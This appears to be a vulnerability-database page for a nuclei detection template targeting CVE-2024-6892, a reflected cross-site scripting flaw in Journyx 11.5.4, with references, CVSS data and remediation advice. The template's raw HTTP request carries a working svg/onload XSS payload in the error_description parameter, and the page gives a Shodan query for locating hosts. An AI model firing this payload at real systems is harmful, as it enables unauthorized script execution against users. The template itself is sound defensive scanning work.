Lucene search
K

Journyx 11.5.4 - Reflected Cross Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Journyx 11.5.4 has a reflected cross site scripting vulnerability allowing arbitrary JavaScript execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Journyx 11.5.4 Cross Site Scripting Vulnerability
8 Aug 202400:00
zdt
Circl
CVE-2024-6892
8 Aug 202403:01
circl
CVE
CVE-2024-6892
7 Aug 202423:19
cve
Cvelist
CVE-2024-6892 Journyx Reflected Cross Site Scripting
7 Aug 202423:19
cvelist
KoreLogic Security
Journyx Reflected Cross Site Scripting
7 Aug 202400:00
korelogic
NVD
CVE-2024-6892
8 Aug 202400:15
nvd
OSV
CVE-2024-6892
8 Aug 202400:15
osv
Packet Storm
Journyx 11.5.4 Cross Site Scripting
8 Aug 202400:00
packetstorm
Positive Technologies
PT-2024-37933 · Journyx · Journyx
7 Aug 202400:00
ptsecurity
Vulnrichment
CVE-2024-6892 Journyx Reflected Cross Site Scripting
7 Aug 202423:19
vulnrichment
Rows per page
id: CVE-2024-6892

info:
  name: Journyx 11.5.4 - Reflected Cross Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
  impact: |
    Attackers can craft malicious URLs with XSS payloads in the error_description parameter to execute arbitrary JavaScript when victims click the link.
  remediation: |
    Update Journyx to version 11.5.5 or later to address the reflected XSS vulnerability.
  reference:
    - https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt
    - http://seclists.org/fulldisclosure/2024/Aug/7
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-6892
    cwe-id: CWE-81,CWE-79
    epss-score: 0.00713
    epss-percentile: 0.49168
    cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: journyx
    product: journyx
    shodan-query: html:"Journyx"
  tags: cve,cve2024,xss,journyx,seclists,vuln

http:
  - raw:
      - |
        GET /jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&error=error HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<P>error <B><svg/onload=prompt('document.domain')></B></P>"
          - "journyx"
        condition: and
        case-insensitive: true

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4a0a0047304502201169cae9c75d7e2aaefd8599aae4f41203d7b9da5c05cc3aea12de7f8409aa54022100c058c353cee0cd7e6aa414f08ae2f9a08c62ae295171a073bb84723f41df5ee9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
EPSS0.00713
SSVC
14